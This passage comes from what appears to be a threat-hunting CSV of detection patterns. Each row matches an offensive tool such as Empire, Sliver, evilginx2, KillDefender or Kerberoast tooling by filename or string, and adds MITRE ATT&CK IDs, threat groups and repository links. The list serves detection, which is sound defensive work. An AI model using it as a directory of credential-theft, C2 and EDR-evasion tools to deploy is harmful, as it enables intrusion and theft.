- T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - 
T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*kgretzky*",".{0,1000}kgretzky.{0,1000}","offensive_tool_keyword","Github Username","username Kuba Gretzky hosting sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*kgretzky/evilginx2*",".{0,1000}kgretzky\/evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*kgretzky/evilqr*",".{0,1000}kgretzky\/evilqr.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*kgretzky/pwndrop*",".{0,1000}kgretzky\/pwndrop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - 
TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*kh4sh3i/Spring-CVE*",".{0,1000}kh4sh3i\/Spring\-CVE.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*khast3x*",".{0,1000}khast3x.{0,1000}","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/khast3x","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*khast3x/h8mail*",".{0,1000}khast3x\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*Kicking off download cradle in a new process*",".{0,1000}Kicking\soff\sdownload\scradle\sin\sa\snew\sprocess.{0,1000}","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*kick-operator -n *",".{0,1000}kick\-operator\s\-n\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*KidLogger-*.dmg*",".{0,1000}KidLogger\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - 
TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kidlogger.conf*",".{0,1000}kidlogger\.conf.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Kidlogger.exe*",".{0,1000}Kidlogger\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.lnk*",".{0,1000}KidLogger\.lnk.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.net*",".{0,1000}KidLogger\.net.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.pif*",".{0,1000}KidLogger\.pif.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.url*",".{0,1000}KidLogger\.url.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*kidlogger_install*",".{0,1000}kidlogger_install.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kidlogger_user.exe*",".{0,1000}kidlogger_user\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*killAllNimplants*",".{0,1000}killAllNimplants.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*killdefender check*",".{0,1000}killdefender\scheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender kill*",".{0,1000}killdefender\skill.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*KillDefender.h*",".{0,1000}KillDefender\.h.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" 
"*KillDefender.x64*",".{0,1000}KillDefender\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KillDefender.x64.*",".{0,1000}KillDefender\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender_bof*",".{0,1000}killdefender_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KillDefender_BOF*",".{0,1000}KillDefender_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*KillDefenderBOF-main*",".{0,1000}KillDefenderBOF\-main.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*Killed running eventvwr*",".{0,1000}Killed\srunning\seventvwr.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Killed running sdclt*",".{0,1000}Killed\srunning\ssdclt.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Killer tool for EDR/AV Evasion --> IAT Obfuscation*",".{0,1000}Killer\stool\sfor\sEDR\/AV\sEvasion\s\-\-\>\sIAT\sObfuscation.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*kill-implant*",".{0,1000}kill\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - 
T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Killing ngrok tunnel*",".{0,1000}Killing\sngrok\stunnel.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","#stringcontent","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*killprocess.py*",".{0,1000}killprocess\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*kimi_MDPC/kimi.py*",".{0,1000}kimi_MDPC\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" 
"*KINGSABRI/ServerlessRedirector*",".{0,1000}KINGSABRI\/ServerlessRedirector.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*kiosk.sh*startVNC.sh*",".{0,1000}kiosk\.sh.{0,1000}startVNC\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*kirbi.tickets*",".{0,1000}kirbi\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kirbi_to_hashcat.py*",".{0,1000}kirbi_to_hashcat\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*kirbi2john.*",".{0,1000}kirbi2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 